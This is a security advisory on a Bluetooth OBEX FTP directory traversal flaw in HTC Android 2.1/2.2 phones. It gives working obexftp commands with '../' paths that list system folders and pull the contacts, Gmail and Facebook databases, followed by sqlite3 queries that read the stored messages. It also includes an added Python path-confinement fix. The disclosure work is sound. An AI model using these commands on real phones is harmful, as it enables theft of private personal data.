Title: HTC / Android OBEX FTP Service Directory Traversal
Summary
HTC devices running Android 2.1 and Android 2.2 are prone to a directory traversal vulnerability in the Bluetooth OBEX FTP Service. Exploiting this issue allows a remote authenticated attacker to list arbitrary directories and read arbitrary files via a ../ in a pathname.
This vulnerability is related to CVE-2009-0244, a vulnerability discovered in 2009/01 affecting HTC devices running Windows Mobile 6 and Windows Mobile 6.1 and reported to HTC Europe throughout 2009/02 - 2009/06. After the vulnerability was fully disclosed in 2009/07, HTC issued security hotfixes under the name "Hotfix to enhance the security mechanism of Bluetooth service" for all the affected products. HTC reproduced the same security flaw in Android phones shipped throughout 2010 and 2011.
Description
HTC / Android phones currently ship with a Bluetooth stack that provides Bluetooth communications with other remote devices. The File Transfer Profile (OBEX FTP) is one of the Bluetooth services that may be implemented in the stack.
The following example is the output of a command for finding nearby devices supporting the File Transfer Profile (FTP) with sdptool, a tool available in Linux since kernel version 2.4.6. Given the known profile name FTP, the command searches for Bluetooth devices nearby and inquires whether the File Transfer Profile (FTP) is supported.
gospel@ubuntu:~$ sdptool search FTP
Inquiring ...
Searching for FTP on 90:21:55:8C:2C:3A ...
Service Name: OBEX File Transfer
Service RecHandle: 0x10006
Service Class ID List:
  "OBEX File Transfer" (0x1106)
Protocol Descriptor List:
  "L2CAP" (0x0100)
  "RFCOMM" (0x0003)
    Channel: 4
  "OBEX" (0x0008)
Profile Descriptor List:
  "OBEX File Transfer" (0x1106)
    Version: 0x0100
The OBEX FTP Service
The OBEX FTP service is a software implementation of the File Transfer Profile (FTP). The File Transfer Profile (FTP) is intended for data exchange and it is based on the OBEX communications client-server protocol. The service is present in a large number of Bluetooth mobile phones. This service can be used for sending files from the phone to other remote devices and also allows remote devices to browse shared folders and download files from the phone.
The OBEX FTP service installed in HTC / Android phones is accessible from a PC by using an OBEX FTP client such as ObexFTP or gnomevfs-ls on Linux.
The following example is the output of a command for listing a directory with ObexFTP. Given the Bluetooth MAC address of the mobile phone and no path or the default path /, the command retrieves the content of the default directory of the FTP server.
gospel@ubuntu:~$ obexftp -b 90:21:55:8C:2C:3A -l
Browsing 90:21:55:8C:2C:3A ...
Connecting..\done
Tried to connect for 1583ms
Receiving "(null)"...|
<?xml version="1.0"?>
<!DOCTYPE folder-listing SYSTEM "obex-folder-listing.dtd">
<folder-listing version="1.0">
<folder name="LOST.DIR"/>
<folder name=".footprints"/>
<folder name="Music"/>
<folder name="Photo"/>
<file name="HTCDriver_2.0.7.17.exe" size="13702288" user-perm="R" created="20100519T195058Z"/>
<folder name="albumthumbs"/>
<folder name="dcim"/>
<folder name="rssreader"/>
</folder-listing>
done
Disconnecting../done
In HTC / Android phones, the FTP Server can be activated only after the user has inserted an SD card in the device. Once activated, the service is configured so that only the files placed on the SD card are shared. The default directory of the FTP Server in the file system is /sdcard. The user cannot select any other directory, so sensitive files belonging to the operating system are not supposed to be exposed.
The OBEX FTP Service Directory Traversal vulnerability
There exists a Directory Traversal vulnerability in the OBEX FTP Service in the Bluetooth Stack implemented in HTC devices running Android 2.1 and Android 2.2. As in the case of Windows Mobile (CVE-2009-0244), the OBEX FTP Server is a 3rd party driver developed by HTC and installed on HTC devices running the Android operating system, so the vulnerability affects this vendor specifically.
A remote attacker (who has previously obtained authentication and authorization rights) can use tools like ObexFTP or gnomevfs-ls on Linux to traverse to parent directories outside the default Bluetooth shared folder by using ../ or ..\\ sequences.
The following example is the output of a command for listing a directory with ObexFTP. Given the Bluetooth MAC address of an HTC / Android based mobile phone and the path ../, the command retrieves the content of the parent of the default directory of the FTP server, that is, the root directory of the disk file system.
gospel@ubuntu:~$ obexftp -b 90:21:55:8C:2C:3A -l "../"
Browsing 90:21:55:8C:2C:3A ...
Connecting..\done
Tried to connect for 29ms
Receiving "../"... Sending ".."...|done
<?xml version="1.0"?>
<!DOCTYPE folder-listing SYSTEM "obex-folder-listing.dtd">
<folder-listing version="1.0">
<parent-folder/>
<folder name="sqlite_stmt_journals"/>
<folder name="config"/>
<folder name="sdcard"/>
<folder name="d"/>
<folder name="etc"/>
<folder name="cache"/>
<folder name="system"/>
<folder name="sys"/>
<folder name="sbin"/>
<folder name="proc"/>
<file name="logo.rle" size="11336" user-perm="R" created="19700101T090000Z"/>
<file name="init.rc" size="14664" user-perm="R" created="19700101T090000Z"/>
<file name="init.goldfish.rc" size="1677" user-perm="R" created="19700101T090000Z"/>
<file name="init.buzz.rc" size="3608" user-perm="R" created="19700101T090000Z"/>
<file name="init" size="107668" user-perm="R" created="19700101T090000Z"/>
<file name="default.prop" size="118" user-perm="R" created="19700101T090000Z"/>
<folder name="data"/>
<folder name="root"/>
<folder name="dev"/>
</folder-listing>
done
Disconnecting..-done
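As an added defensive example (not HTC's code and not part of the original advisory), the following Python models the check the vulnerable OBEX FTP server is missing: every SETPATH step that obexftp prints as Sending "..." and every GET name is confined to the shared folder, so the ../ and ..\ sequences shown above are refused instead of walking up to /. SHARED_ROOT is the advisory's /sdcard; the class, method names and the SETPATH model are assumptions made for this illustration.

```python
import posixpath

# Added example, not HTC's code, of the confinement check a hardened OBEX FTP server
# needs. SHARED_ROOT is the advisory's default folder; everything else is assumed.
SHARED_ROOT = "/sdcard"

class ObexPathError(ValueError):
    """A client-supplied name would leave the shared folder."""

class ObexFolderJail:
    """Current folder of one OBEX FTP session, kept as segments under the root."""
    def __init__(self, root=SHARED_ROOT):
        self.root = posixpath.normpath(root)
        self.segments = []  # folder relative to root; empty means the root itself

    @staticmethod
    def _split(name):
        # Clients may send '/' or '\' separators; drop empty and '.' components.
        return [s for s in name.replace("\\", "/").split("/") if s not in ("", ".")]

    def _up(self):
        # The vulnerable server walked above /sdcard here; refuse instead.
        if not self.segments:
            raise ObexPathError("backup above shared root refused")
        self.segments.pop()

    def setpath(self, name="", backup=False):
        """OBEX SETPATH: the backup flag or a '..' component selects the parent."""
        for seg in ([".."] if backup else []) + self._split(name):
            self._up() if seg == ".." else self.segments.append(seg)
        return posixpath.join(self.root, *self.segments)

    def resolve(self, name):
        """Map a GET/PUT name to an absolute path, refusing anything outside root."""
        here = posixpath.join(self.root, *self.segments)
        target = posixpath.normpath(posixpath.join(here, *self._split(name)))
        if posixpath.commonpath([self.root, target]) != self.root:
            raise ObexPathError(f"{name!r} escapes {self.root}")
        return target

def replay(setpath_names, get_name):
    """Replay SETPATHs (obexftp's 'Sending "..."') then a GET; None if refused."""
    jail = ObexFolderJail()
    try:
        for name in setpath_names:
            jail.setpath(name)
        return jail.resolve(get_name)
    except ObexPathError:
        return None
```

Replaying the advisory's own sequence, replay(["..", "data"], "") returns None, while a name inside the SD card such as replay(["Music"], "song.mp3") resolves normally.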
Requirements to exploit the vulnerability
The only requirement is that the attacker must have authentication and authorization privileges over Bluetooth. Pairing with the remote device should be enough to obtain them, either by using Legacy Pairing (Bluetooth 2.0) or Secure Simple Pairing (Bluetooth 2.1 and 3.0). However, more sophisticated attacks, such as sniffing the Bluetooth pairing, link key cracking and MAC address spoofing, can be used to avoid this step when Legacy Pairing (Bluetooth 2.0) is in use. Once the attacker has obtained the proper privileges, further actions will be transparent to the user.
Devices must have Bluetooth enabled and FTP Server active when the attack is performed.

Scope of the attack
The Directory Traversal vulnerability allows the attacker to traverse to parent directories outside the default Bluetooth shared folder by using ../ or ..\\ sequences. This security flaw allows browsing folders located anywhere in the file system and downloading any file contained in any folder.
1) List arbitrary directories
Any directory within the file system of the phone can be browsed, beyond the limits of the default shared folder (the SDCard).
The following example is the output of a command for listing a directory with ObexFTP. Given the Bluetooth MAC address of an HTC / Android based mobile phone and the path ../data/, the command retrieves the content of the directory /data/ in the disk file system.
gospel@ubuntu:~$ obexftp -b 90:21:55:8C:2C:3A -l "../data/"
Browsing 90:21:55:8C:2C:3A ...
Connecting..\done
Tried to connect for 34ms
Receiving "../data/"... Sending ".."...|Sending "data".../done
<?xml version="1.0"?>
<!DOCTYPE folder-listing SYSTEM "obex-folder-listing.dtd">
<folder-listing version="1.0">
<parent-folder/>
<folder name="backup"/>
<file name="pvcodec.txt" size="2" user-perm="R" created="20110202T122059Z"/>
<folder name="system"/>
<folder name="anr"/>
<folder name="dalvik-cache"/>
<folder name="drm"/>
<folder name="property"/>
<file name="rtsp_proxy" size="0" user-perm="R" created="19800106T092934Z"/>
<folder name="app"/>
<folder name="app-private"/>
<folder name="data"/>
<folder name="local"/>
<folder name="misc"/>
<file name="http_proxy" size="0" user-perm="R" created="19800106T092934Z"/>
<folder name="dontpanic"/>
<folder name="lost+found"/>
</folder-listing>
done
Disconnecting..\done
2) Read arbitrary files
Any file located in the file system can be downloaded. This may expose confidential data such as contacts, messages, emails or temporary internet files.
- Contacts database, located in /data/data/com.android.providers.contacts/databases/contacts2.db.

The following example is the output of a command for downloading a file with ObexFTP. Given the Bluetooth MAC address of an HTC / Android based mobile phone and the pathname ../data/data/com.android.providers.contacts/databases/contacts2.db, the command retrieves the contacts database.
gospel@ubuntu:~$ obexftp -b 90:21:55:8C:2C:3A -g "../data/data/com.android.providers.contacts/databases/contacts2.db"
Browsing 90:21:55:8C:2C:3A ...
Connecting..\done
Tried to connect for 50ms
Receiving "../data/data/com.android.providers.contacts/databases/contacts2.db"... Sending ".."...|Sending "data".../Sending "data"...-Sending "com.android.providers.contacts"...\Sending "databases"...|done
/done
Disconnecting..-done
The following example is the output of a SQL command for querying the contacts stored in the phone database, once downloaded from the device. Contacts are stored in plain text.
gospel@ubuntu:~$ ./sqlite3 contacts2.db "SELECT data.data1 from data INNER JOIN raw_contacts ON data.raw_contact_id = raw_contacts._id WHERE raw_contacts.account_type='com.htc.android.pcsc'"
08012341234
Philip J. Fry
pjfry@planex.com
08043214321
Bender Rodriguez
bender@planex.com
08098765432
Turanga Leela
leela@planex.com
08012345678
Hubert J. Farnsworth
farnsworth@planex.com
08014725836
Dr. Zoidberg
zoidberg@planex.com
08069696969
Zapp Brannigan
brannigan@doop.com
08088888888
Amy Wong
wong@planex.com
Contacts synced from Google and Facebook accounts can also be queried from the same database.

The following example is the output of a SQL command for querying the contacts synced from Google. Contacts are stored in plain text.
gospel@ubuntu:~$ ./sqlite3 contacts2.db "SELECT data.data1 from data INNER JOIN raw_contacts ON data.raw_contact_id = raw_contacts._id WHERE raw_contacts.account_type='com.google'"
The following example is the output of a SQL command for querying the contacts synced from Facebook. Contacts are stored in plain text.
gospel@ubuntu:~$ ./sqlite3 contacts2.db "SELECT data.data1 from data INNER JOIN raw_contacts ON data.raw_contact_id = raw_contacts._id WHERE raw_contacts.account_type='com.htc.socialnetwork.facebook'"
*********
Aitana *******
Aitana *******
********@gmail.com
http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs712.ash1/******_**********_*******_*.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs718.ash1/******_**********_*******_*.jpg
*********
Akemi ********
Akemi ********
********@i.softbank.jp
http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs712.ash1/******_**********_*******_*.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs718.ash1/******_**********_*******_*.jpg
- Emails from the Google account downloaded via the GMAIL application, located in /data/data/com.google.android.providers.gmail/databases/mailstore.*****@gmail.com.db

The following example is the output of a command for downloading a file with ObexFTP. Given the Bluetooth MAC address of an HTC / Android based mobile phone and the pathname /data/data/com.google.android.providers.gmail/databases/mailstore.*****@gmail.com.db, the command retrieves the email database.
gospel@ubuntu:~$ obexftp -b 90:21:55:8C:2C:3A -g "../data/data/com.google.android.providers.gmail/databases/mailstore.*****@gmail.com.db"
Browsing 90:21:55:8C:2C:3A ...
Connecting..\done
Tried to connect for 26ms
Receiving "../data/data/com.google.android.providers.gmail/databases/mailstore.*****@gmail.com.db"... Sending ".."...|Sending "data".../Sending "data"...-Sending "com.google.android.providers.gmail"...\Sending "databases"...|done
|done
Disconnecting../done
The following example is the output of a SQL command for querying an email stored in the email database, once downloaded from the device. Emails are stored in plain text.
gospel@ubuntu:~$ ./sqlite3 mailstore.*****@gmail.com.db "SELECT fromAddress, toAddresses, subject, body FROM messages WHERE _id=1"
""<******@his-world.co.jp>|"" <*****@gmail.com>|Information of ''Trip for You'' itinerary|This e-mail is delivered to you by online itinerary service, AXESS "Trip for You". You can check the itinerary anytime from the following URL.<br />
<br />
<a href="https://www.tripforyou.net/t4u/Auth.do?id=***************************************" target="_blank">https://www.tripforyou.net/<wbr />t4u/Auth.do?id=<wbr />=***************************************" <wbr /></a><br />
<br />
Hello.<br />
This is your E-ticket.<br />
Please check it and print yourself.<br />
- Friends, conversations, mailbox_messages, etc. from the Facebook account downloaded via the FACEBOOK application, located in ../data/data/com.facebook.katana/databases/fb.db
The following example is the output of a command for downloading a file with ObexFTP. Given the Bluetooth MAC address of an HTC / Android based mobile phone and the pathname ../data/data/com.facebook.katana/databases/fb.db, the command retrieves the Facebook database.
gospel@ubuntu:~$ obexftp -b 90:21:55:8C:2C:3A -g "../data/data/com.facebook.katana/databases/fb.db"
Browsing 90:21:55:8C:2C:3A ...
Connecting..\done
Tried to connect for 30ms
Receiving "../data/data/com.facebook.katana/databases/fb.db"... Sending ".."...|Sending "data".../Sending "data"...-Sending "com.facebook.katana"...\Sending "databases"...|done |done
Disconnecting../done
The following example is the output of a SQL command for querying information stored in the Facebook database, once downloaded from the device. Information is stored in plain text.
gospel@ubuntu:~$ ./sqlite3 fb.db ".tables"
albums friends page_search_results
android_metadata friends_data perf_sessions
cache key_value photos
chatconversations mailbox_messages search_results
chatmessages mailbox_messages_display stream_photos
connections mailbox_profiles user_statuses
default_page_images mailbox_threads user_values
events notifications
gospel@ubuntu:~$ ./sqlite3 fb.db "pragma table_info('mailbox_messages');"
0|_id|INTEGER|0||1
1|folder|INT|0||0
2|tid|INT|0||0
3|mid|INT|0||0
4|author_id|INT|0||0
5|sent|INT|0||0
6|body|TEXT|0||0
gospel@ubuntu:~$ ./sqlite3 fb.db "SELECT * FROM mailbox_messages WHERE _id=2"
2|0|10153235210237880|4|100000198131786|1991797311|so most likely , france 5 days. then bordoux (1 night) or maybe no, then madrid few days. then barcelona. then go back madrid then paris.
